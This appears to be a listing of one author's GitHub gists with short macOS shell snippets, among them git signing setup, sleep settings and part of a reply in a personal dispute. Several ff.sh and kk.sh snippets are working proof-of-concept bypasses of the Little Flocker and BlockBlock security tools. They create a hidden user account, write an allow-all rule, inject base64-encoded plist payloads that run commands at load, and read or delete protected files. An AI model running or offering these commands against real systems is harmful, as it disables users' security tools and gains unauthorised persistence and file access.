View git.sh
# Install GPG Tools 2 and generate your PGP keys
# Add the public key in your Github account
# Get your long id by doing: gpg --list-keys --keyid-format long
# Execute this:
# Ty https://github.com/Microsoft/vscode/issues/5065#issuecomment-207960831
git config --global user.signingkey [LONG KEY ID] && git config --global commit.gpgsign true && git config --global gpg.program gpg2; echo 'no-tty' >> ~/.gnupg/gpg.conf
View nosleep.sh
# Useful to prevent Macbooks to go to sleep when closing the lid instead of running tools that requires a Kernel Extension (e.g. InsomniaX) and more
sudo pmset -a sleep 0; sudo pmset -a hibernatemode 0; sudo pmset -a disablesleep 1;
View Google Chrome Extension Watcher.flock
watch prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "any" wcxm
allow prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" r
View uninstall_vmware.sh
#!/usr/bin/env bash
# Usage: bash uninstall_vmware.bash
remove() {
entry="$1"
echo -ne "Removing $entry ["
sudo rm -rf "$entry"
if [[ ! -e "$entry" ]]; then
echo -ne "OK"
View ff.sh
# - An attacker can prevent the agent from showing the app icon (via /dev/null)
mknod /tmp/LittleFlockerTemp.png c 1 3
# - A file with a long name can hide buttons when the popup appear
touch $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
nano $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
# - Little Flocker does not watch every startup folders/files therefore an
# attacker can create startup items at these places (thanks Patrick Wardle):
View response.txt
Hello,
Here is the last discussion I had with him (he dared mentioned me on a 10 days old topic and then when I give arguments to the very same topic or replies to his attacks I "harass" him): https://github.com/drduh/OS-X-Security-and-Privacy-Guide/pull/128
So I’m going to do this really fast to prevent making another blog post from happening again and wasting even more time.
Jonathan recycled an old pastebin he made to do some propaganda against me (https://twitter.com/pwnsdx/status/770353299140771840) so I'm going to clarify this here, point by point:
Diff between both pastebin: https://i.imgur.com/TRqgn5g.png
View ff.sh
# Disarm Little Flocker silently (privileged)
FAKEUSER=pwned$(grep -m1 -ao '[0-9][0-9]' /dev/urandom | sed s/10/99/ | head -n1); echo "Creating fake user account..." && dscl . -create /Users/$FAKEUSER IsHidden 1 && dscl . -create /Users/$FAKEUSER UserShell /bin/bash && dscl . -create /Users/$FAKEUSER RealName "${FAKEUSER}" && dscl . -create /Users/$FAKEUSER UniqueID "1202" && dscl . -create /Users/$FAKEUSER PrimaryGroupID 80 && echo "Injecting payload..." && echo 'allow prefix "/" "any" rwcm' > /var/empty/.littleflockerrc && sync && echo "Please wait (up to 1 minute)..." && sleep 61 && dscl . -delete /Users/$FAKEUSER && rm -rf /var/empty/.littleflockerrc && echo "Little Flocker is now disarmed" && cd /Users
# UPDATE (0.0.77)
# Still works, broken fix:
# https://github.com/jzdziarski/littleflocker/commit/bcce9cf279eb27b04cf644ecc49fee767f1e0579
# 1. via /Users/Shared
echo "Creating fake user account..." && dscl . -create /Users/Shared IsHidden 1 && dscl . -create /Users/Shared UserShell /bin/bash && dscl . -
View kk.sh
# Inject malicious datas into BlockBlock plist (will create "pwned-unprivileged" file in /tmp) (unprivileged)
(> ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBbdG91Y2ggL3RtcC9wd25lZC11bnByaXZpbGVnZWQ7IC9BcHBsaWNhdGlvbnMvQmxvY2tCbG9jay5hcHAvQ29udGVudHMvTWFjT1MvQmxvY2tCbG9jayBhZ2VudAlfECFjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suYWdlbnQIESc6REpLT1RXtbYAAAAAAAABAQAAAAAAAAAMAAAAAAAAAAAAAAAAAAAA2g==" | base64 --decode) > ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist)
# Inject malicious datas into BlockBlock plist (will create "pwned-privileged" file in /tmp) (privileged)
(> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBadG91Y2ggL3RtcC9wd25lZC1wcml2aWxlZ2VkOyAvQXBwbGljYXRpb25zL0Jsb2NrQmxvY2suYXBwL0NvbnRlbnRzL01hY09TL0Jsb2NrQmxvY2sgZGFlbW
View ff.sh
# Read files (privileged)
DIRTOSEE="$HOME/Desktop/test"; DIRSIZE=$(du -mc "$DIRTOSEE" | grep "total" | cut -d$'\t' -f1 | xargs); DIRNAMEHASH=$(echo "$DIRSIZE$DIRTOSEE$(date +%s)" | /usr/bin/openssl sha1); sudo /usr/bin/hdiutil create -ov -size $(($DIRSIZE+1))m -nospotlight -noanyowners -skipunreadable -srcowners off -format UDRO -fs HFS+ -volname .$DIRNAMEHASH -srcfolder "$DIRTOSEE" /tmp/.$DIRNAMEHASH.dmg && hdiutil attach -readonly -noverify -noautofsck -noautoopen -mountpoint /private/tmp/.$DIRNAMEHASH /private/tmp/.$DIRNAMEHASH.dmg && cd /private/tmp/.$DIRNAMEHASH
View ff.sh
# Delete a file (unprivileged)
FILETODELETE="$HOME/Desktop/test/com.evilcorp.plist"; /System/Library/PrivateFrameworks/oncrpc.framework/bin/rpcgen --xdr --output $FILETODELETE